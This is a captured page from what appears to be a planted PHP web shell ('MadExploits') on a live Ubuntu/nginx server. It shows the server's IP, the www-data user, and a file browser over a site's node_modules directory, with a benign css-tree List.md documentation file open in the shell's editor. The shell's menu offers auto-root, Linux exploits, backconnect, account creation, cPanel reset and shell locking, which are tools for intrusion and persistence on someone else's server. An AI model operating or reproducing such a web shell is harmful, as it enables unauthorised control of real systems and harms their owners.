Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
css-tree /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
.DS_Store
6
KB
-rw-r--r--
Lexer.md
22
B
-rw-r--r--
List.md
2.42
KB
-rw-r--r--
Tokenizer.md
3.48
KB
-rw-r--r--
api-map.svg
41.53
KB
-rw-r--r--
ast.md
9.59
KB
-rw-r--r--
generate.md
875
B
-rw-r--r--
parsing.md
7.03
KB
-rw-r--r--
readme.md
266
B
-rw-r--r--
supported.md
10.6
KB
-rw-r--r--
syntax.md
39
B
-rw-r--r--
traversal.md
7.96
KB
-rw-r--r--
utils.md
3.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : List.md
# List <!-- MarkdownTOC --> - [Static methods](#static-methods) - [List.createItem](#listcreateitem) - [Properties](#properties) - [List#head](#listhead) - [List#tail](#listtail) - [List#cursor](#listcursor) - [Methods](#methods) - [List#createItem\(\)](#listcreateitem-1) - [List#updateCursors\(\)](#listupdatecursors) - [List#getSize\(\)](#listgetsize) - [List#fromArray\(\)](#listfromarray) - [List#toArray\(\)](#listtoarray) - [List#toJSON\(\)](#listtojson) - [List#isEmpty\(\)](#listisempty) - [List#first\(\)](#listfirst) - [List#last\(\)](#listlast) - [List#each\(\)](#listeach) - [List#forEach\(\)](#listforeach) - [List#eachRight\(\)](#listeachright) - [List#forEachRight\(\)](#listforeachright) - [List#nextUntil\(\)](#listnextuntil) - [List#prevUntil\(\)](#listprevuntil) - [List#some\(\)](#listsome) - [List#map\(\)](#listmap) - [List#filter\(\)](#listfilter) - [List#clear\(\)](#listclear) - [List#copy\(\)](#listcopy) - [List#prepend\(\)](#listprepend) - [List#prependData\(\)](#listprependdata) - [List#append\(\)](#listappend) - [List#appendData\(\)](#listappenddata) - [List#insert\(\)](#listinsert) - [List#insertData\(\)](#listinsertdata) - [List#remove\(\)](#listremove) - [List#push\(\)](#listpush) - [List#pop\(\)](#listpop) - [List#unshift\(\)](#listunshift) - [List#shift\(\)](#listshift) - [List#prependList\(\)](#listprependlist) - [List#appendList\(\)](#listappendlist) - [List#insertList\(\)](#listinsertlist) - [List#replace\(\)](#listreplace) <!-- /MarkdownTOC --> ## Static methods ### List.createItem ## Properties ### List#head ### List#tail ### List#cursor ## Methods ### List#createItem() ### List#updateCursors() ### List#getSize() ### List#fromArray() ### List#toArray() ### List#toJSON() ### List#isEmpty() ### List#first() ### List#last() ### List#each() ### List#forEach() ### List#eachRight() ### List#forEachRight() ### List#nextUntil() ### List#prevUntil() ### List#some() ### List#map() ### List#filter() ### List#clear() ### List#copy() ### List#prepend() ### List#prependData() ### List#append() ### List#appendData() ### List#insert() ### List#insertData() ### List#remove() ### List#push() ### List#pop() ### List#unshift() ### List#shift() ### List#prependList() ### List#appendList() ### List#insertList() ### List#replace()
Close